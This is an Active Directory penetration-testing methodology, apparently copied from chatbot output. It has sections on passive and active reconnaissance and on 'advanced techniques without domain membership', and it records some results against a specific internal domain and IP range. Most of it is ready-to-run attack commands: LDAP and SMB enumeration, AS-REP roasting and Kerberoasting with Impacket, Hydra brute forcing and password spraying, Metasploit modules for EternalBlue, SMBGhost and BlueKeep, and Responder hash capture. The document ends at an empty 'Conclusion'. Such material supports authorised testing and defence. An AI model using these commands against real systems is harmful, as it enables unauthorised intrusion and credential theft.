1.

Passive Reconnaissance (External Information Gathering)

This phase is focused on gathering as much information about the Active Directory
environment without interacting directly with the domain.

a. DNS Enumeration

Active Directory relies heavily on DNS for service discovery. By querying DNS records, you
can gather important information about domain controllers, services, and more.

 SRV Records: These records are used to locate domain controllers and other AD
services like LDAP, Kerberos, and the Global Catalog.

bash
Copy code
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain-name>

nslookup -type=SRV _kerberos._tcp.dc._msdcs.<domain-name>

 Zone Transfers: Misconfigured DNS servers might allow you to request a zone
transfer and get a list of domain controllers, server names, and other domain-related
details.

bash
Copy code
nslookup
set type=any
ls -d <domain-name>
 The DNS server refused to transfer the zone kkf.org to your computer.

 DNS TXT Records: These can contain additional metadata about the domain. Some
domains may store useful details such as internal names, service records, and more.

bash
Copy code
nslookup -type=TXT <domain-name>

b. LDAP Enumeration

LDAP (port 389 by default) is the protocol used by Active Directory for querying and
managing the directory. Even if you're not part of the domain, you can sometimes query the
LDAP service anonymously.

 Nmap LDAP Enumeration: Nmap has a script that can query LDAP for information
about users, groups, and other directory objects.

bash
Copy code
nmap -p 389 --script ldap-search 10.0.70.0/24

 LDAPSearch: You can use ldapsearch (available on Linux and through

Cygwin/Windows) to perform an anonymous search on the LDAP directory.

bash
Copy code
 ldapsearch -x -b "c=kkfsrv-dc3,dc=kkf,dc=local" "*" -H
ldap://10.0.70.22

If anonymous binding is allowed, this will give you a list of users, groups, and other
directory objects.

Secure Configurations are applied there is no anonymous binding is allowed

c. SMB Enumeration

SMB (port 445) is commonly used in AD environments for file sharing, domain services, and
other network services. Enumerating SMB shares can give you valuable information.

 Enum4Linux: This is a tool for enumerating SMB shares and users from Linux
systems.

bash
Copy code
enum4linux -a <target-IP>

 Smbclient: You can also use smbclient to list shared folders and attempt to access
them anonymously.

bash
Copy code
smbclient -L //<target-IP> -U ""
  Nmap SMB Enumeration: Use Nmap to check SMB version and details about
exposed services.

bash
Copy code
nmap -p 445 --script smb-os-fingerprint <target-IP>

d. Kerberos Enumeration

Kerberos (used by Active Directory for authentication) is often available to external attackers
even without domain membership. You can attempt to gather information on service accounts
and weaknesses in Kerberos configurations.

 AS-REP Roasting: AS-REP roasting is the process of requesting authentication for

service accounts that don’t have pre-authentication enabled, which allows you to
capture the encrypted ticket and attempt to crack it offline.

bash
Copy code
python3 GetNPUsers.py <domain>/<user>@<domain-controller> -
outputfile=asrep.txt

 Impacket Kerberos Tools: Impacket provides tools that allow you to interact with
Kerberos. For example, GetUserSPNs.py can be used to extract service account
tickets that can be cracked offline.

bash
Copy code
python3 GetUserSPNs.py <domain>/<user>@<domain-controller> -request

2. Active Reconnaissance (Direct Interactions with Services)

Once you have identified services and machines that may be of interest, you can probe them
more actively. This stage involves directly querying or interacting with services exposed
externally to extract more information or attempt exploitation.

a. Brute Forcing / Password Spraying

Password spraying involves trying a small number of common passwords against a large
number of accounts to avoid lockouts. This can be effective when testing for weak or reused
passwords.

 Hydra for SMB: If SMB is exposed, you can brute-force logins using tools like
Hydra.

bash
Copy code
hydra -L userlist.txt -P passwordlist.txt smb://<target-IP>

 Hydra for RDP: RDP (port 3389) can also be targeted with brute force if it’s
exposed.
 bash
Copy code
hydra -t 4 -L userlist.txt -P passlist.txt rdp://<target-IP>

 Password Spraying: Instead of brute-forcing multiple passwords on a single account,

password spraying uses a common password (e.g., Winter2023!) against many
accounts, which helps avoid triggering account lockouts.

bash
Copy code
hydra -L userlist.txt -P passwordlist.txt smb://<target-IP>

b. Exploiting SMB Vulnerabilities

Some older versions of SMB are vulnerable to remote code execution attacks, such as
EternalBlue (MS17-010). These vulnerabilities can be exploited without domain
membership if SMB is exposed.

 EternalBlue Exploit (MS17-010): You can exploit SMB vulnerabilities using

Metasploit or standalone exploits.

bash
Copy code
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-IP>
run

 SMB Ghost (CVE-2020-0796): If the target is running vulnerable versions of SMB

(prior to patches being applied), you can use SMB Ghost to gain access.

bash
Copy code
msfconsole
use exploit/windows/smb/cve_2020_0796_smb_ghost
set RHOSTS <target-IP>
run

c. Exploiting RDP Vulnerabilities

RDP (Remote Desktop Protocol) can also be vulnerable to exploits, and some older versions
are susceptible to bugs that can allow attackers to execute code remotely.

 BlueKeep (CVE-2019-0708): BlueKeep is a critical vulnerability in RDP that allows

unauthenticated remote code execution. You can exploit this via Metasploit.

bash
Copy code
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <target-IP>
run

3. Advanced Techniques Without Domain Membership

a. Kerberoasting

Kerberoasting is a method of attacking service accounts in Active Directory without needing

domain credentials. After requesting service tickets (TGS), you can attempt to crack them
offline.

 Impacket's GetUserSPNs.py: This script will enumerate service principal names

(SPNs) from a domain controller. These are associated with service accounts, and if
the service accounts are weakly configured, you can extract and crack the tickets.

bash
Copy code
python3 GetUserSPNs.py <domain>/<user>@<domain-controller> -request

b. Exploiting Service Accounts

Service accounts sometimes have weak passwords or are misconfigured, which makes them
prime targets. You can identify weak service accounts via Kerberos ticket enumeration or
SMB share enumeration.

c. Man-in-the-Middle Attacks

If you are within the network and can intercept traffic, you can use MITM techniques to
capture authentication tokens or hashes. Tools like Responder or Impacket can help with
poisoning NetBIOS or SMB traffic to capture hashes.

 Responder: This tool can be used to poison network traffic and capture NTLMv1/v2
hashes.

bash
Copy code
responder -I <interface>

d. DNS Spoofing or SMB Relay

If the internal network is misconfigured, you could attempt to redirect traffic using DNS
spoofing or relay SMB authentication attempts to capture hashes or credentials.

Conclusion